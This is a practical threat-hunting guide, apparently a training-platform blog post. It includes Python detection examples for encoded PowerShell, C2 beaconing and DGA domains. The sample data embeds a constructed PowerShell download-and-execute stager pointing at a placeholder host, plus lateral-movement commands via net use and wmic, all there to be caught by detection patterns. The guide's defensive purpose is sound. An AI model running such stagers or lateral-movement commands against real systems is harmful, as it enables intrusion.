Alert triage is reactive. You wait for a detection to fire, investigate the alert, and either close it or escalate. Threat hunting is different. You do not wait. You form a hypothesis about where an attacker might be hiding in the environment, design a query to test it, and go looking before anything fires.
Modern SOCs increasingly embed hunting in daily operations rather than treating it as a separate function: analysts dedicate part of their time to hypothesis-driven investigations between alert handling. Organisations that integrate hunting properly into SOC workflows have reported improvements of around 40% in overall threat detection.
This is a practical guide to doing it in a browser, without enterprise infrastructure, using the methodology and tools that working threat hunters use.
What Is Threat Hunting and How Is It Different From Alert Triage?
Alert triage asks: what is this alert telling me? Threat hunting asks: what might be happening that no alert has caught yet?
Sophisticated adversaries use living-off-the-land techniques (abusing built-in tools such as PowerShell and WMI), zero-day exploits, and cloud-native attacks to blend in with legitimate activity, and they frequently bypass automated detection as a result. SOC threat hunting addresses this by having analysts form hypotheses, investigate anomalies, and uncover threats before they escalate.
The practical difference is in how you use the SIEM. Alert triage means reading what the platform surfaces. Threat hunting means writing the queries yourself, asking questions the platform was not configured to ask, and looking for patterns that exist in the data but have not been flagged.
The limitation of a SIEM is that it is query-driven. You find what you know to ask for. Novel threats that fall outside predefined correlation rules or known indicators of compromise can sit in SIEM data for months without surfacing. Threat hunting is how you find them.
What Does Threat Hunting Look Like in Practice?
There are three main approaches: structured hunting, which follows a formal methodology based on known threats and hypotheses often mapped to MITRE ATT&CK; unstructured hunting, which relies on analyst intuition and exploration to identify anomalies without a predefined hypothesis; and situational or entity-driven hunting, which focuses on specific high-risk entities or recent events such as a new vulnerability or insider threat.
For analysts getting started, structured hunting is the right place to begin. It is repeatable, documentable, and teachable. Here is what it looks like step by step.
Step 1: Form the hypothesis. A good hunting hypothesis is specific and falsifiable. Not "there might be malware" but "an attacker with initial access is using PowerShell to execute commands and move laterally, and I should be able to see that in process creation logs." Hypothesis-driven hunting usually maps to a MITRE ATT&CK tactic such as credential access or lateral movement, which gives the hunt structure and ties it to known adversary workflows.
Step 2: Identify the data source. Which logs would contain evidence of this behaviour if it were happening? Windows Event ID 4688 (or Sysmon Event ID 1) for process creation. Zeek conn.log for unusual outbound connections. DNS logs for high-frequency queries suggesting C2 beaconing. The hypothesis determines the data source. The data source determines the query. Check the data before you query it: 4688 only carries the command line when the "Include command line in process creation events" audit policy is enabled, and a PowerShell hunt over 4688 events without that field will find nothing whether or not the attacker is there.
Step 3: Write and run the query. In Splunk, this means SPL. In Sentinel, KQL. The query is designed to return results that would confirm or refute the hypothesis. A good query filters aggressively. You are not looking for all PowerShell execution, you are looking for PowerShell execution with the flags that indicate weaponisation: -EncodedCommand, -WindowStyle Hidden, -NonInteractive, -NoProfile, -ExecutionPolicy Bypass, and their abbreviated forms (-enc, -w hidden, -noni, -nop, -ep bypass), since PowerShell accepts any unambiguous prefix of a parameter name. Any one of these also turns up in legitimate administration scripts, so filter on combinations, on an encoded payload, or on an unusual parent process such as an Office application rather than on a single flag.
Step 4: Analyse and pivot. A single hypothesis may be refined iteratively as evidence is uncovered, allowing hunters to pivot through the environment and correlate low-signal artifacts into a broader narrative of compromise. When a query returns something interesting, the next question is always: what else happened around this, on this host, at this time?
Step 5: Document and convert. Every hunt produces one of two outcomes: either you found something (investigate and escalate) or you did not (document the hunt and consider converting it to a detection rule so the next occurrence fires automatically). Document hunt activities and findings; automate repetitive tasks to free up analysts for deeper investigations.
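The five steps above, carried through as one runnable hunt. This is an added example written for this article, not code from TryHackMe or from any SIEM: the events are constructed to look like the fields a SIEM maps from Event ID 4688, the indicator weights and the threshold of 3 are assumptions chosen for illustration, and the decoded stager URL is a placeholder rather than a real indicator. The detection logic is the SPL or KQL query of step 3 expressed in Python so it can run offline; the pivot function is step 4.

```python
"""Added example, not from the original article: a structured hunt run over
constructed Windows Event ID 4688-style process creation records.

Hypothesis: an attacker with initial access is running encoded PowerShell
and moving laterally from the foothold.
Query (step 3): PowerShell launches carrying weaponisation flags.
Pivot (step 4): everything else that ran on the same host around each hit.
"""
import base64
import re
from datetime import datetime, timedelta

# Constructed payload showing what a stager looks like once decoded.
# The host and path are placeholders for this example, not real indicators.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
_ENC = base64.b64encode(_STAGER.encode("utf-16-le")).decode()

# Constructed events using the field names a SIEM typically maps from 4688.
# The last record shows the empty command line you get when "Include command
# line in process creation events" is not enabled: check for that first.
EVENTS = [
    {"ts": "2024-05-01T09:14:02", "host": "WS-042", "parent": "explorer.exe",
     "image": "powershell.exe", "cmd": "powershell.exe -NoProfile -Command Get-Date"},
    {"ts": "2024-05-01T09:20:11", "host": "WS-042", "parent": "WINWORD.EXE",
     "image": "powershell.exe", "cmd": f"powershell.exe -NoP -W Hidden -NonI -Enc {_ENC}"},
    {"ts": "2024-05-01T09:20:15", "host": "WS-042", "parent": "powershell.exe",
     "image": "net.exe", "cmd": r"net use \\FS-01\C$ /user:corp\svc_backup *"},
    {"ts": "2024-05-01T09:21:40", "host": "WS-042", "parent": "powershell.exe",
     "image": "wmic.exe", "cmd": "wmic /node:FS-01 process call create cmd.exe"},
    {"ts": "2024-05-01T11:02:00", "host": "WS-017", "parent": "services.exe",
     "image": "powershell.exe",
     "cmd": r"powershell.exe -NonInteractive -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ts": "2024-05-01T11:05:00", "host": "WS-017", "parent": "services.exe",
     "image": "powershell.exe", "cmd": ""},
]

# PowerShell accepts any unambiguous prefix of a parameter name, so each
# pattern also covers the short forms (-enc, -w hidden, -noni, -nop, -ep).
# Weight 2: rarely seen in legitimate automation. Weight 1: common in admin
# scripts, so it only counts in combination with something else (assumed weights).
INDICATORS = [
    ("EncodedCommand", 2, re.compile(r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c|n)?\s+[A-Za-z0-9+/=]{16,}")),
    ("WindowStyle Hidden", 2, re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")),
    ("NonInteractive", 1, re.compile(r"(?i)(?:^|\s)-noni(?:nteractive)?\b")),
    ("NoProfile", 1, re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b")),
    ("ExecutionPolicy Bypass", 1, re.compile(r"(?i)(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass")),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def score_event(ev):
    """Return (score, matched indicator names) for one process creation event."""
    if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    matched = [(name, w) for name, w, rx in INDICATORS if rx.search(ev["cmd"])]
    score = sum(w for _, w in matched)
    names = [name for name, _ in matched]
    if ev["parent"].lower() in OFFICE_PARENTS:  # Office app spawning PowerShell
        names.append("Office parent")
        score += 2
    return score, names

def decode_encoded_command(cmd):
    """Decode an -EncodedCommand payload (base64 of UTF-16LE) or return None."""
    m = INDICATORS[0][2].search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0).split()[-1]).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def hunt(events, threshold=3):
    """Step 3, the query. A threshold of 3 means one common flag such as
    -NonInteractive on its own is not a hit; it needs company."""
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "why": why,
                         "decoded": decode_encoded_command(ev["cmd"])})
    return hits

def pivot(events, hit, window_minutes=5):
    """Step 4, the pivot: what else ran on this host around the hit?"""
    t0 = datetime.fromisoformat(hit["ts"])
    window = timedelta(minutes=window_minutes)
    return [ev for ev in events
            if ev["host"] == hit["host"] and ev["ts"] != hit["ts"]
            and abs(datetime.fromisoformat(ev["ts"]) - t0) <= window]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(f"[{hit['ts']}] {hit['host']} score={hit['score']} {hit['why']}")
        print("  decoded:", hit["decoded"])
        for ev in pivot(EVENTS, hit):
            print(f"  pivot: {ev['ts']} {ev['parent']} -> {ev['cmd']}")
```

Run as written, the only hit is the Word-spawned, hidden, encoded PowerShell on WS-042; the scheduled inventory script on WS-017 scores 2 and stays below the threshold even though it carries -NonInteractive and -ExecutionPolicy Bypass, which is the caveat from step 3 in action. The pivot then surfaces the net use and wmic executions that followed within five minutes, which is the lateral movement half of the hypothesis and what you would write up before converting the query into a detection rule (step 5).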
Which Tools Do SOC Analysts Use for Threat Hunting?
| Tool | What hunters use it for | Key data it provides | Query language | Practise on TryHackMe |
|---|---|---|---|---|
| Splunk | Log aggregation and correlation. Writing hunt queries across multiple data sources in a single interface. | Windows events, network logs, endpoint telemetry, authentication logs | SPL (Search Processing Language) | Threat Hunting module |
| Microsoft Sentinel | Cloud-native SIEM. Dominant in enterprise Microsoft environments. Hunting notebooks and analytics rules. | Microsoft Entra ID (formerly Azure AD), Microsoft 365, Windows, network, identity logs | KQL (Kusto Query Language) | Threat Hunting module |
| Wireshark | Network traffic analysis. Inspecting packet captures for C2 beaconing, data exfiltration, and lateral movement over the network. | Full packet capture, protocol decode, session reconstruction | Display filter syntax | SOC Level 1 path |
| Zeek | Structured network log generation. Hunting across conn.log, dns.log, http.log, ssl.log for anomalous patterns. | Connection metadata, DNS queries, HTTP activity, TLS certificates | Log-based querying (zeek-cut, grep, awk, or SIEM ingest) | SOC Level 1 path |
| YARA | Pattern matching against files and memory. Writing rules to hunt for specific malware families or code patterns across a file system. | File system, memory dumps, binaries | YARA rule syntax | Threat Hunting module |
| MITRE ATT&CK Navigator | Mapping hunt coverage against known adversary TTPs. Identifying which techniques your current hunts do not cover. | Adversary tactics and techniques framework | Browser-based, no query language | Threat Hunting module |
How Do You Practise Threat Hunting Without an Enterprise Environment?
This is the question most analysts at Tier 1 ask when they want to develop hunting skills but do not yet have access to a live SOC environment with meaningful data. The answer is that browser-based lab environments solve this problem directly.
TryHackMe's Threat Hunting module puts you inside a pre-configured environment with real log data, working SIEM tooling, and structured scenarios that mirror what genuine threat hunting investigations look like. You are not reading about how to write an SPL query. You are writing one against actual data, investigating actual anomalies, and documenting what you find.
The specific value of doing this in a browser is zero infrastructure overhead. No Splunk licence, no SIEM deployment, no log pipeline to configure. You open the room and you are already inside the environment. That is the reason the TryHackMe platform exists for security training generally, and it applies equally to threat hunting.
The SOC Level 1 path builds the foundational SIEM and log analysis skills that threat hunting extends. If SIEM queries feel effortful rather than automatic, the SOC Level 1 path is the right place to build that fluency before moving into hunting-specific scenarios.
What Are the Best Practices for Network Traffic Analysis in Threat Hunting?
Network traffic analysis is one of the highest-value data sources for threat hunting and one that many analysts underuse because interpreting raw packet data is slower than reading SIEM alerts.
The practical approach is to use Zeek's structured logs rather than raw PCAP for most hunting scenarios. Zeek transforms raw traffic into structured fields (source IP, destination IP, port, protocol, bytes transferred, duration, and more), all queryable without reading individual packets. For most threat hunting hypotheses involving network behaviour, Zeek logs are faster and more scalable than Wireshark.
What to hunt for in network data: DNS queries to newly registered domains or to names with high entropy, often accompanied by bursts of NXDOMAIN responses (common indicators of DGA activity); repeated outbound connections to the same destination at near-regular intervals with consistent byte counts (C2 beaconing; implants usually add jitter, so look at the distribution of intervals rather than for exact periodicity); large outbound data transfers outside business hours (exfiltration); and internal lateral movement visible as SMB or RDP connections between hosts that do not normally communicate.
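The two preceding paragraphs, Zeek's structured fields and the beaconing and DGA hunts, as one added example written for this article rather than code from Zeek, TryHackMe or any SIEM. The conn.log and dns.log excerpts are constructed and trimmed to the columns used, although they keep Zeek's real TSV layout (a "#fields" header, "-" for unset values) so the same parser reads real files. The thresholds (a coefficient of variation of 0.25, an entropy floor of 3.5 bits, a 20% digit ratio) are illustrative assumptions, not tuned values, and the registrable-label extraction deliberately ignores the public suffix list.

```python
"""Added example, not from the original article: two hunts run over
constructed Zeek logs trimmed to the fields used here. Real conn.log and
dns.log carry more columns but keep the same '#fields' header, so the
parser below works unchanged on the real files.
Hunt 1 (conn.log): C2 beaconing, tolerant of jitter.
Hunt 2 (dns.log): DGA-looking names by label entropy and digit ratio.
Thresholds are illustrative starting points (assumed), not tuned values.
"""
import math
import statistics
from collections import Counter, defaultdict

# Constructed conn.log: 10.1.2.30 beacons to 203.0.113.7 roughly every 60 s
# with near-constant request sizes, and also browses 198.51.100.20 normally.
CONN_LOG = """#separator \\x09
#fields\tts\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\torig_bytes\tresp_bytes
1714550400.000000\t10.1.2.30\t49811\t203.0.113.7\t443\ttcp\tssl\t312\t1180
1714550405.200000\t10.1.2.30\t49812\t198.51.100.20\t443\ttcp\tssl\t1520\t88210
1714550409.700000\t10.1.2.30\t49813\t198.51.100.20\t443\ttcp\tssl\t42000\t3400
1714550462.100000\t10.1.2.30\t49820\t203.0.113.7\t443\ttcp\tssl\t318\t1180
1714550480.300000\t10.1.2.30\t49821\t198.51.100.20\t443\ttcp\tssl\t830\t512000
1714550500.000000\t10.1.2.55\t51002\t198.51.100.20\t443\ttcp\t-\t-\t-
1714550519.800000\t10.1.2.30\t49833\t203.0.113.7\t443\ttcp\tssl\t312\t1180
1714550580.400000\t10.1.2.30\t49840\t203.0.113.7\t443\ttcp\tssl\t324\t1196
1714550641.000000\t10.1.2.30\t49851\t203.0.113.7\t443\ttcp\tssl\t312\t1180
1714550730.900000\t10.1.2.30\t49860\t198.51.100.20\t443\ttcp\tssl\t9900\t20100
#close\t2024-05-01-12-00-00
"""

# Constructed dns.log: two random-looking names from 10.1.2.44 come back
# NXDOMAIN, typical of a DGA walking through candidate domains.
DNS_LOG = """#fields\tts\tid.orig_h\tquery\tqtype_name\trcode_name
1714550401.000000\t10.1.2.30\twww.example.com\tA\tNOERROR
1714550402.000000\t10.1.2.30\tlogin.microsoftonline.com\tA\tNOERROR
1714550403.000000\t10.1.2.44\tx7k2p9q4m1zv8b.net\tA\tNXDOMAIN
1714550404.000000\t10.1.2.44\tqj3w9xz0ltp2rk7h.com\tA\tNXDOMAIN
1714550405.000000\t10.1.2.44\tmail.corp.local\tA\tNOERROR
"""

def parse_zeek(text):
    """Parse Zeek's default TSV: '#fields' names the columns, other '#' lines
    are metadata, and '-' marks an unset field."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows

def cv(xs):
    """Coefficient of variation (pstdev / mean): 0 means perfectly regular."""
    if len(xs) < 2 or statistics.mean(xs) <= 0:
        return float("inf")
    return statistics.pstdev(xs) / statistics.mean(xs)

def find_beacons(conns, min_conns=4, max_cv=0.25):
    """Flag (src, dst, port) pairs whose inter-arrival times and request sizes
    are both unusually regular. Using CV instead of exact periodicity
    tolerates the jitter real implants add."""
    groups = defaultdict(list)
    for c in conns:
        groups[(c["id.orig_h"], c["id.resp_h"], c["id.resp_p"])].append(c)
    beacons = []
    for (src, dst, port), rows in groups.items():
        if len(rows) < min_conns:
            continue
        ts = sorted(float(r["ts"]) for r in rows)
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        sizes = [int(r["orig_bytes"]) for r in rows if r["orig_bytes"] != "-"]
        if cv(gaps) <= max_cv and cv(sizes) <= max_cv:
            beacons.append({"src": src, "dst": dst, "port": port, "count": len(rows),
                            "period_s": round(statistics.mean(gaps), 1),
                            "gap_cv": round(cv(gaps), 3)})
    return beacons

def shannon_entropy(s):
    """Bits per character; random-looking labels score well above real words."""
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())

def registrable_label(fqdn):
    """Second-level label ('example' from 'www.example.com'). A public suffix
    list is needed for names like example.co.uk; omitted here for brevity."""
    parts = fqdn.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def find_dga_queries(dns, min_entropy=3.5, min_digit_ratio=0.2):
    """Entropy alone misfires on long legitimate names (microsoftonline scores
    about 3.3 bits), so also require a meaningful share of digits."""
    out = []
    for r in dns:
        label = registrable_label(r["query"])
        ent = shannon_entropy(label)
        digits = sum(ch.isdigit() for ch in label) / len(label)
        if ent >= min_entropy and digits >= min_digit_ratio:
            out.append({"src": r["id.orig_h"], "query": r["query"],
                        "entropy": round(ent, 2), "rcode": r["rcode_name"]})
    return out

if __name__ == "__main__":
    for b in find_beacons(parse_zeek(CONN_LOG)):
        print("beacon:", b)
    for q in find_dga_queries(parse_zeek(DNS_LOG)):
        print("dga-like:", q)
```

The beacon hunt flags only the 203.0.113.7 pair: five connections about 60 seconds apart with request sizes within a few bytes of each other, even though no two intervals are identical. The browsing to 198.51.100.20 has the same source, port and protocol but irregular timing and wildly varying sizes, so it passes. On real data the next pivot is the ssl.log entries for the flagged destination (certificate issuer, SNI) and the dns.log query that first resolved it. The DGA hunt returns the two NXDOMAIN names and leaves login.microsoftonline.com alone, which is why the digit-ratio check is there alongside entropy.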
Wireshark becomes valuable when you need to go deeper on a specific connection: reconstructing the session, reading the payload, or verifying that encrypted traffic has the characteristics of the protocol it claims to be.
FAQ
What is threat hunting in a SOC? Threat hunting is the proactive practice of searching for threats that automated detection has not caught. Where alert triage responds to what the SIEM flags, threat hunting involves analysts forming hypotheses based on known adversary behaviour, writing queries to test those hypotheses against available log data, and investigating the results to determine whether a threat is present.
How is threat hunting different from incident response? Incident response begins when a confirmed incident has been identified. Threat hunting takes place before confirmation, often before any alert has fired. Hunters look for signs of compromise that have not yet triggered a detection. When a hunt finds something, that finding typically initiates an incident response.
What skills do you need to start threat hunting? SIEM proficiency is the most important prerequisite. You need to be able to write queries, interpret results, and correlate data across multiple log sources before hunting is productive. Familiarity with MITRE ATT&CK, Windows event log IDs, and network traffic patterns is the next layer. Scripting in Python or PowerShell helps with automation but is not required to begin.
Can you practise threat hunting without enterprise infrastructure? Yes. TryHackMe's Threat Hunting module provides pre-configured environments with real log data and working tooling in a browser. This removes the infrastructure barrier that stops most analysts from practising hunting skills outside of their workplace.
What is the best way to get started with threat hunting? Start with a structured hypothesis mapped to a specific MITRE ATT&CK technique you understand well. Choose a data source you are already familiar with: Windows event logs if you have SIEM experience, network logs if you have networking experience. Write a query, run it, investigate what comes back. Document the process. Repeat with a different technique. Hunting ability is built through repetition, not through reading about it.
Nick O'Grady